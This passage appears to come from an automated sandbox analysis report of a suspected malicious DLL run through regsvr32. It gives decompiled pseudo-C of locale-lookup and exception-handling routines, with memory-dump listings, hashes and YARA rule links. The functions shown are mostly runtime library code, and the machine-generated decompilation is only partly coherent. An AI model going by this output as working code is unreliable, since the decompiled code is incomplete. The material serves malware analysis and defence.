				 *_a8 =  *_a8 | 0x00000003;
				goto 0x8005a74d;
				 *_a8 =  *_a8 & 0xfffffffe;
				 *_a8 =  *_a8 | 0x00000002;
				goto 0x8005a74d;
				 *_a8 =  *_a8 & 0xfffffffd;
				 *_a8 =  *_a8 | 0x00000001;
				goto 0x8005a74d;
				 *_a8 =  *_a8 & 0xfffffffc;
				 *_a8 =  *_a8 & 0xfffe001f;
				 *_a8 =  *_a8 | (r9d & 0x00000fff) << 0x00000005;
				_t284 = _a48;
				_a8[8] = _a8[8] | 0x00000001;
				if (_a56 == 0) goto 0x8005a7ab;
				_a8[8] = _a8[8] & 0xffffffe1;
				_a8[4] =  *_a40;
				_a8[0x18] = _a8[0x18] | 0x00000001;
				_a8[0x18] = _a8[0x18] & 0xffffffe1;
				_a8[0x14] =  *_t284;
				goto 0x8005a7f3;
				r8d = 0xffffffe3;
				_a8[8] = _a8[8] & r8d | 0x00000002;
				_a8[4] =  *_a40;
				_a8[0x18] = _a8[0x18] | 0x00000001;
				_a8[0x18] = _a8[0x18] & r8d | 0x00000002;
				_t280 =  *_t284;
				_a8[0x14] = _t280;
				E0000000118005A9E0(_a8[0x18] & r8d | 0x00000002);
				_t122 = _t280 + 1; // 0x1
				r8d = _t122;
				RaiseException(_t286, ??, ??);
				_t276 = _a8;
				if ((_t276[2] & 0x00000010) == 0) goto 0x8005a81d;
				asm("dec eax");
				if ((_t276[2] & 0x00000008) == 0) goto 0x8005a829;
				asm("dec eax");
				if ((_t276[2] & 0x00000004) == 0) goto 0x8005a835;
				asm("dec eax");
				if ((_t276[2] & 0x00000002) == 0) goto 0x8005a841;
				asm("dec eax");
				_t219 = _t276[2] & 0x00000001;
				if (_t219 == 0) goto 0x8005a84a;
				asm("dec eax");
				if (_t219 == 0) goto 0x8005a881;
				if (_t219 == 0) goto 0x8005a875;
				if (_t219 == 0) goto 0x8005a869;
				if (( *_t276 & 0x00000003) != 1) goto 0x8005a888;
				 *__rdx =  *__rdx | 0x00006000;
				goto 0x8005a888;
				asm("dec eax");
				asm("dec eax");
				goto 0x8005a888;
				asm("dec eax");
				asm("dec eax");
				goto 0x8005a888;
				 *__rdx =  *__rdx & 0xffff9fff;
				if (_a56 == 0) goto 0x8005a895;
				_t184 = _t276[0x14];
				 *_t284 = _t184;
				goto 0x8005a89c;
				 *_t284 = _t276[0x14];
				return _t184;
			}




















                                                                                                              0x18005a5a4
                                                                                                              0x18005a5a7
                                                                                                              0x18005a5ab
                                                                                                              0x18005a5af
                                                                                                              0x18005a5b3
                                                                                                              0x18005a5cc
                                                                                                              0x18005a5d3
                                                                                                              0x18005a5da
                                                                                                              0x18005a5e1
                                                                                                              0x18005a5ec
                                                                                                              0x18005a5f4
                                                                                                              0x18005a5ff
                                                                                                              0x18005a607
                                                                                                              0x18005a612
                                                                                                              0x18005a61a
                                                                                                              0x18005a625
                                                                                                              0x18005a62d
                                                                                                              0x18005a638
                                                                                                              0x18005a63c
                                                                                                              0x18005a64f
                                                                                                              0x18005a652
                                                                                                              0x18005a655
                                                                                                              0x18005a668
                                                                                                              0x18005a66b
                                                                                                              0x18005a66e
                                                                                                              0x18005a681
                                                                                                              0x18005a684
                                                                                                              0x18005a69c
                                                                                                              0x18005a6b1
                                                                                                              0x18005a6be
                                                                                                              0x18005a6c4
                                                                                                              0x18005a6cb
                                                                                                              0x18005a6cd
                                                                                                              0x18005a6d1
                                                                                                              0x18005a6d8
                                                                                                              0x18005a6de
                                                                                                              0x18005a6e5
                                                                                                              0x18005a6eb
                                                                                                              0x18005a6f2
                                                                                                              0x18005a6f4
                                                                                                              0x18005a6f8
                                                                                                              0x18005a703
                                                                                                              0x18005a706
                                                                                                              0x18005a70e
                                                                                                              0x18005a716
                                                                                                              0x18005a71b
                                                                                                              0x18005a721
                                                                                                              0x18005a724
                                                                                                              0x18005a72a
                                                                                                              0x18005a731
                                                                                                              0x18005a734
                                                                                                              0x18005a73a
                                                                                                              0x18005a741
                                                                                                              0x18005a744
                                                                                                              0x18005a74a
                                                                                                              0x18005a75a
                                                                                                              0x18005a764
                                                                                                              0x18005a76a
                                                                                                              0x18005a76e
                                                                                                              0x18005a776
                                                                                                              0x18005a781
                                                                                                              0x18005a78e
                                                                                                              0x18005a795
                                                                                                              0x18005a79d
                                                                                                              0x18005a7a6
                                                                                                              0x18005a7a9
                                                                                                              0x18005a7af
                                                                                                              0x18005a7be
                                                                                                              0x18005a7cc
                                                                                                              0x18005a7d4
                                                                                                              0x18005a7e5
                                                                                                              0x18005a7ec
                                                                                                              0x18005a7ef
                                                                                                              0x18005a7f3
                                                                                                              0x18005a800
                                                                                                              0x18005a800
                                                                                                              0x18005a804
                                                                                                              0x18005a80a
                                                                                                              0x18005a813
                                                                                                              0x18005a815
                                                                                                              0x18005a81f
                                                                                                              0x18005a821
                                                                                                              0x18005a82b
                                                                                                              0x18005a82d
                                                                                                              0x18005a837
                                                                                                              0x18005a839
                                                                                                              0x18005a841
                                                                                                              0x18005a843
                                                                                                              0x18005a845
                                                                                                              0x18005a84f
                                                                                                              0x18005a854
                                                                                                              0x18005a859
                                                                                                              0x18005a85e
                                                                                                              0x18005a860
                                                                                                              0x18005a867
                                                                                                              0x18005a869
                                                                                                              0x18005a86e
                                                                                                              0x18005a873
                                                                                                              0x18005a875
                                                                                                              0x18005a87a
                                                                                                              0x18005a87f
                                                                                                              0x18005a881
                                                                                                              0x18005a88c
                                                                                                              0x18005a88e
                                                                                                              0x18005a891
                                                                                                              0x18005a893
                                                                                                              0x18005a899
                                                                                                              0x18005a8b0

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                              • String ID:
                                                                                                              • API String ID: 15204871-0
                                                                                                              • Opcode ID: d29c67289edb359be945bc1961ea775e490fe4b6ed4f826ee0bd904efa327dd1
                                                                                                              • Instruction ID: c97eed978cef30f730eb6731270c757ed79ce32c4f66f3fe1506e66c22d9e68d
                                                                                                              • Opcode Fuzzy Hash: d29c67289edb359be945bc1961ea775e490fe4b6ed4f826ee0bd904efa327dd1
                                                                                                              • Instruction Fuzzy Hash: 98B13F77604B888BEB5ACF29C88639C77A0F349B88F19C911EB59977A4CF36C556C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180026618 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $*
                                                                                                              • API String ID: 0-3982473090
                                                                                                              • Opcode ID: cbb723abfe9f4ec0d8c8eb036de060b6dfe44589079c12ceef08ccfe426d80c4
                                                                                                              • Instruction ID: dbbf3c7052fd73b93ed08d9f933d8f662607d997a6fee2a04e1eca43dbe4e28e
                                                                                                              • Opcode Fuzzy Hash: cbb723abfe9f4ec0d8c8eb036de060b6dfe44589079c12ceef08ccfe426d80c4
                                                                                                              • Instruction Fuzzy Hash: AFC1B57290478886EBE78F2980543AD3BA4F30EF8DF298115EB89473A5CF35C689C755
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180042F88 Relevance: 1.7, APIs: 1, Instructions: 152COMMONCrypto
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 100%
                                                                                                              			E00000001180042F88(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
				signed long long _t24;
				signed long long _t26;
				void* _t29;

				 *((long long*)(_t29 + 8)) = __rbx;
				 *(_t29 + 0x10) = _t24;
				 *((long long*)(_t29 + 0x18)) = __rsi;
				_t26 = (_t24 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rcx + _t26 * 2)) != 0) goto 0x80042fb6;
				if (_t26 + 1 -  !__r8 <= 0) goto 0x80042fef;
				return 0xc;
			}






                                                                                                              0x180042f88
                                                                                                              0x180042f8d
                                                                                                              0x180042f92
                                                                                                              0x180042fb6
                                                                                                              0x180042fbd
                                                                                                              0x180042fcb
                                                                                                              0x180042fee

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b1787d91b7b01cab9f7a5e9b6d8eda6d83fe559f5a685be6db3c52a8f5294103
                                                                                                              • Instruction ID: a1fd2bab10b53138a76cc8431c182f8d484a84e1cf649b3f09138d12cc51342a
                                                                                                              • Opcode Fuzzy Hash: b1787d91b7b01cab9f7a5e9b6d8eda6d83fe559f5a685be6db3c52a8f5294103
                                                                                                              • Instruction Fuzzy Hash: 1951F432700A8485FBA19F72A9807DE7BA0F7487E8F159214FE9827B95CE38C609C744
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004C5B0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 56%
                                                                                                              			E0000000118004C5B0(void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v264;
				unsigned int _t22;
				signed int _t23;
				void* _t25;
				unsigned int _t33;
				intOrPtr _t38;
				signed long long _t53;
				signed long long _t54;
				void* _t56;
				unsigned int* _t67;
				signed long long _t69;
				void* _t71;

				_t64 = __rdx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t53 =  *0x80070098; // 0xde2ac6aee6eb
				_t54 = _t53 ^ _t71 - 0x00000120;
				_v24 = _t54;
				_t56 = __rcx;
				E0000000118003CFF0(_t54, __rcx, __rdx, __rsi);
				_t69 = _t54;
				E0000000118003CFF0(_t54, _t56, _t64, _t69);
				_t67 =  *((intOrPtr*)(_t54 + 0x3a0));
				_t22 = E0000000118004C6B8(_t56, _t64);
				r9d = 0x78;
				_t33 = _t22;
				asm("sbb edx, edx");
				_t23 = GetLocaleInfoW(??, ??, ??, ??);
				if (_t23 != 0) goto 0x8004c62b;
				 *_t67 =  *_t67 & _t23;
				goto 0x8004c693;
				_t25 = E00000001180014B1C(_t54,  *((intOrPtr*)(_t69 + 0x98)));
				_t38 =  *((intOrPtr*)(_t69 + 0xb0));
				if (_t25 != 0) goto 0x8004c64f;
				if (_t38 != 0) goto 0x8004c680;
				goto 0x8004c672;
				if (_t38 != 0) goto 0x8004c689;
				if ( *((intOrPtr*)(_t69 + 0xac)) == _t38) goto 0x8004c689;
				if (E00000001180014B1C(_t54,  *((intOrPtr*)(_t69 + 0x98))) != 0) goto 0x8004c689;
				if (E0000000118004C7DC(_t33, 0, _t54, _t56,  *((intOrPtr*)(_t69 + 0x98)),  &_v264, _t69) == 0) goto 0x8004c689;
				 *_t67 =  *_t67 | 0x00000004;
				_t67[1] = _t33;
				_t67[2] = _t33;
				return E000000011800028F0( !( *_t67 >> 2) & 0x00000001, _t33, _v24 ^ _t71 - 0x00000120);
			}

















                                                                                                              0x18004c5b0
                                                                                                              0x18004c5b0
                                                                                                              0x18004c5b5
                                                                                                              0x18004c5c2
                                                                                                              0x18004c5c9
                                                                                                              0x18004c5cc
                                                                                                              0x18004c5d4
                                                                                                              0x18004c5d7
                                                                                                              0x18004c5dc
                                                                                                              0x18004c5df
                                                                                                              0x18004c5e7
                                                                                                              0x18004c5ee
                                                                                                              0x18004c600
                                                                                                              0x18004c608
                                                                                                              0x18004c60a
                                                                                                              0x18004c618
                                                                                                              0x18004c620
                                                                                                              0x18004c622
                                                                                                              0x18004c629
                                                                                                              0x18004c637
                                                                                                              0x18004c63c
                                                                                                              0x18004c644
                                                                                                              0x18004c648
                                                                                                              0x18004c64d
                                                                                                              0x18004c651
                                                                                                              0x18004c659
                                                                                                              0x18004c66e
                                                                                                              0x18004c67e
                                                                                                              0x18004c680
                                                                                                              0x18004c683
                                                                                                              0x18004c686
                                                                                                              0x18004c6b7

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastValue$InfoLocale
                                                                                                              • String ID:
                                                                                                              • API String ID: 673564084-0
                                                                                                              • Opcode ID: 04fff14703dedbb10c3c05d2c6a041afa3691c681803a8dd1a3c66ddb6cc07ef
                                                                                                              • Instruction ID: a7c08d8bb0a980455c0b66a7d20b305a9478da93032627e2a1321a5c573ffad1
                                                                                                              • Opcode Fuzzy Hash: 04fff14703dedbb10c3c05d2c6a041afa3691c681803a8dd1a3c66ddb6cc07ef
                                                                                                              • Instruction Fuzzy Hash: BF31C332305A8886EBE5DF25E4817DA73A1F78C7C8F42D135BA4983396DF38D6088701
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004C1D4 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 30%
                                                                                                              			E0000000118004C1D4(void* __ecx, void* __edx, void* __rax, long long __rbx, signed int* __rcx, void* __rdx, signed int __r8, long long _a8) {
				signed int _t35;
				signed char _t36;
				signed char _t37;
				signed int _t52;
				void* _t54;
				signed int* _t58;
				signed short** _t65;
				void* _t66;
				signed long long _t71;
				signed long long _t72;
				signed long long _t74;

				_t54 = __rax;
				_a8 = __rbx;
				_t58 = __rcx;
				E0000000118003CFF0(__rax, __rcx, __rdx, _t66);
				_t71 = __r8 | 0xffffffff;
				_t2 = _t54 + 0x98; // 0x98
				_t65 = _t2;
				_t74 = _t71 + 1;
				if (( *_t65)[_t74] != 0) goto 0x8004c1f9;
				_t65[3] = 0 | _t74 == 0x00000003;
				_t72 = _t71 + 1;
				if (_t65[1][_t72] != 0) goto 0x8004c213;
				r8d = 2;
				_t65[3] = 0 | _t72 == 0x00000003;
				_t58[1] = 0;
				if (_t65[3] != 0) goto 0x8004c262;
				r10d = 0;
				r9d =  *( *_t65) & 0x0000ffff;
				_t16 = _t74 - 0x41; // 0x58
				if (_t16 - 0x19 <= 0) goto 0x8004c25a;
				r9w = r9w - 0x61;
				if (r9w - 0x19 > 0) goto 0x8004c25f;
				r10d =  &(r10d[0]);
				goto 0x8004c23d;
				r8d = r10d;
				_t65[2] = r8d;
				_t35 = EnumSystemLocalesW(??, ??);
				_t52 =  *_t58 & 0x00000007;
				asm("bt ecx, 0x9");
				_t36 = _t35 & 0xffffff00 | _t52 > 0x00000000;
				asm("bt ecx, 0x8");
				_t37 = _t36 & 0xffffff00 | _t52 > 0x00000000;
				if ((_t37 & (0 | _t52 != 0x00000000) & _t36) != 0) goto 0x8004c296;
				 *_t58 = 0;
				return _t37;
			}














                                                                                                              0x18004c1d4
                                                                                                              0x18004c1d4
                                                                                                              0x18004c1de
                                                                                                              0x18004c1e1
                                                                                                              0x18004c1e6
                                                                                                              0x18004c1ef
                                                                                                              0x18004c1ef
                                                                                                              0x18004c1f9
                                                                                                              0x18004c201
                                                                                                              0x18004c20c
                                                                                                              0x18004c213
                                                                                                              0x18004c21b
                                                                                                              0x18004c223
                                                                                                              0x18004c22c
                                                                                                              0x18004c22f
                                                                                                              0x18004c235
                                                                                                              0x18004c23a
                                                                                                              0x18004c23d
                                                                                                              0x18004c244
                                                                                                              0x18004c24c
                                                                                                              0x18004c24e
                                                                                                              0x18004c258
                                                                                                              0x18004c25a
                                                                                                              0x18004c25d
                                                                                                              0x18004c25f
                                                                                                              0x18004c262
                                                                                                              0x18004c272
                                                                                                              0x18004c27a
                                                                                                              0x18004c280
                                                                                                              0x18004c284
                                                                                                              0x18004c289
                                                                                                              0x18004c28d
                                                                                                              0x18004c292
                                                                                                              0x18004c294
                                                                                                              0x18004c2a0

                                                                                                              APIs
                                                                                                                • Part of subcall function 000000018003CFF0: GetLastError.KERNEL32 ref: 000000018003CFFF
                                                                                                                • Part of subcall function 000000018003CFF0: FlsGetValue.KERNEL32 ref: 000000018003D014
                                                                                                                • Part of subcall function 000000018003CFF0: SetLastError.KERNEL32 ref: 000000018003D09F
                                                                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,000000018004CA0B,?,00000000,00000092,?,?,00000000,?,000000018003E281), ref: 000000018004C272
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3029459697-0
                                                                                                              • Opcode ID: 6f7a749c0bafec3919f4f57150461d942c59bbc6645eefc0ab58f5d5bdfbbe37
                                                                                                              • Instruction ID: 3ffbbbfe0ec5c9fdacb820aaf3d0191787d56117823266e480ab26608625024b
                                                                                                              • Opcode Fuzzy Hash: 6f7a749c0bafec3919f4f57150461d942c59bbc6645eefc0ab58f5d5bdfbbe37
                                                                                                              • Instruction Fuzzy Hash: 87112473A04A488AEB968F65D180BE97BA0F398FE8F45C115E625433D0CEB4C7D5C741
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004C7DC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 19%
                                                                                                              			E0000000118004C7DC(signed int __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a16, long long _a24) {
				int _t13;
				signed int _t17;
				void* _t26;
				void* _t35;
				void* _t43;
				signed short* _t51;

				_t43 = __rdx;
				_t35 = __rax;
				_a16 = __rbx;
				_a24 = __rsi;
				_t26 = __edx;
				_t17 = __ecx;
				E0000000118003CFF0(__rax, __rbx, __rdx, __rsi);
				r9d = 2;
				asm("bts ecx, 0xa");
				_t13 = GetLocaleInfoW(??, ??, ??, ??);
				r10d = 0;
				if (_t13 == 0) goto 0x8004c875;
				if (_t17 == _a8) goto 0x8004c86e;
				if (_t26 == 0) goto 0x8004c86e;
				_t51 =  *((intOrPtr*)(_t35 + 0x98));
				r8d = r10d;
				if (_t43 - 0x41 - 0x19 <= 0) goto 0x8004c84f;
				if (( *_t51 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x8004c85b;
				r8d = r8d + 1;
				goto 0x8004c83c;
				if (_t51[( &(_t51[2]) | 0xffffffff) + 1] != r10w) goto 0x8004c85f;
				if (r8d == (_t17 & 0x000003ff)) goto 0x8004c875;
				goto 0x8004c877;
				return 0;
			}









                                                                                                              0x18004c7dc
                                                                                                              0x18004c7dc
                                                                                                              0x18004c7dc
                                                                                                              0x18004c7e1
                                                                                                              0x18004c7eb
                                                                                                              0x18004c7ed
                                                                                                              0x18004c7ef
                                                                                                              0x18004c801
                                                                                                              0x18004c807
                                                                                                              0x18004c813
                                                                                                              0x18004c819
                                                                                                              0x18004c81e
                                                                                                              0x18004c824
                                                                                                              0x18004c828
                                                                                                              0x18004c82a
                                                                                                              0x18004c831
                                                                                                              0x18004c843
                                                                                                              0x18004c84d
                                                                                                              0x18004c852
                                                                                                              0x18004c859
                                                                                                              0x18004c867
                                                                                                              0x18004c86c
                                                                                                              0x18004c873
                                                                                                              0x18004c886

                                                                                                              APIs
                                                                                                                • Part of subcall function 000000018003CFF0: GetLastError.KERNEL32 ref: 000000018003CFFF
                                                                                                                • Part of subcall function 000000018003CFF0: FlsGetValue.KERNEL32 ref: 000000018003D014
                                                                                                                • Part of subcall function 000000018003CFF0: SetLastError.KERNEL32 ref: 000000018003D09F
                                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,000000018004C561), ref: 000000018004C813
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$InfoLocaleValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3796814847-0
                                                                                                              • Opcode ID: aaf272d80b428d5133a0afd77a39b0733f84ada8d575ff1964f0562cdada597b
                                                                                                              • Instruction ID: e572e4013508a40ae2dc72019e1c330ac91dfc9983ebde1ccd39182403175954
                                                                                                              • Opcode Fuzzy Hash: aaf272d80b428d5133a0afd77a39b0733f84ada8d575ff1964f0562cdada597b
                                                                                                              • Instruction Fuzzy Hash: 9D114032714998C2E7F65B12D080BEE2261E748BE8F11822DFB35076C5DE35CA898345
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018004C2A4 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 37%
                                                                                                              			E0000000118004C2A4(void* __ecx, void* __edx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, signed int __r8, long long _a8) {
				int _t17;
				void* _t25;
				void* _t29;
				signed char* _t31;
				signed short* _t36;
				void* _t38;
				signed long long _t44;
				void* _t45;

				_t29 = __rax;
				_a8 = __rbx;
				_t31 = __rcx;
				E0000000118003CFF0(__rax, __rcx, __rdx, _t38);
				_t45 = _t29;
				_t36 =  *((intOrPtr*)(_t29 + 0x98));
				_t44 = (__r8 | 0xffffffff) + 1;
				if (_t36[_t44] != 0) goto 0x8004c2c6;
				_t25 = _t44 - 3;
				 *(_t45 + 0xb0) = 0 | _t25 == 0x00000000;
				if (_t25 == 0) goto 0x8004c30f;
				r9d = 0;
				r8d =  *_t36 & 0x0000ffff;
				if (_t44 - 0x41 - 0x19 <= 0) goto 0x8004c307;
				r8w = r8w - 0x61;
				if (r8w - 0x19 > 0) goto 0x8004c30c;
				r9d = r9d + 1;
				goto 0x8004c2ea;
				 *((intOrPtr*)(_t45 + 0xac)) = r9d;
				_t17 = EnumSystemLocalesW(??, ??);
				if (( *_t31 & 0x00000004) != 0) goto 0x8004c32f;
				 *_t31 = 0;
				return _t17;
			}











                                                                                                              0x18004c2a4
                                                                                                              0x18004c2a4
                                                                                                              0x18004c2ae
                                                                                                              0x18004c2b1
                                                                                                              0x18004c2ba
                                                                                                              0x18004c2bf
                                                                                                              0x18004c2c6
                                                                                                              0x18004c2ce
                                                                                                              0x18004c2d2
                                                                                                              0x18004c2de
                                                                                                              0x18004c2e5
                                                                                                              0x18004c2e7
                                                                                                              0x18004c2ea
                                                                                                              0x18004c2f9
                                                                                                              0x18004c2fb
                                                                                                              0x18004c305
                                                                                                              0x18004c307
                                                                                                              0x18004c30a
                                                                                                              0x18004c30f
                                                                                                              0x18004c322
                                                                                                              0x18004c32b
                                                                                                              0x18004c32d
                                                                                                              0x18004c339

                                                                                                              APIs
                                                                                                                • Part of subcall function 000000018003CFF0: GetLastError.KERNEL32 ref: 000000018003CFFF
                                                                                                                • Part of subcall function 000000018003CFF0: FlsGetValue.KERNEL32 ref: 000000018003D014
                                                                                                                • Part of subcall function 000000018003CFF0: SetLastError.KERNEL32 ref: 000000018003D09F
                                                                                                              • EnumSystemLocalesW.KERNEL32(?,?,?,000000018004C9C7,?,00000000,00000092,?,?,00000000,?,000000018003E281), ref: 000000018004C322
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystemValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3029459697-0
                                                                                                              • Opcode ID: 61a4eac4eb6ff6ac6f3a7ac2fe31d7d9020df02ec08711e42431d02f326703d5
                                                                                                              • Instruction ID: 0cb8ec6749fa517b6198a46ce7d38a9fc7c04a4603ddfa2623d77a224cd3ee05
                                                                                                              • Opcode Fuzzy Hash: 61a4eac4eb6ff6ac6f3a7ac2fe31d7d9020df02ec08711e42431d02f326703d5
                                                                                                              • Instruction Fuzzy Hash: 3D01287270068886EBD25F56E480BDD7691E348BE9F46C222F220472C8DF748688C706
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0000000180046664 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
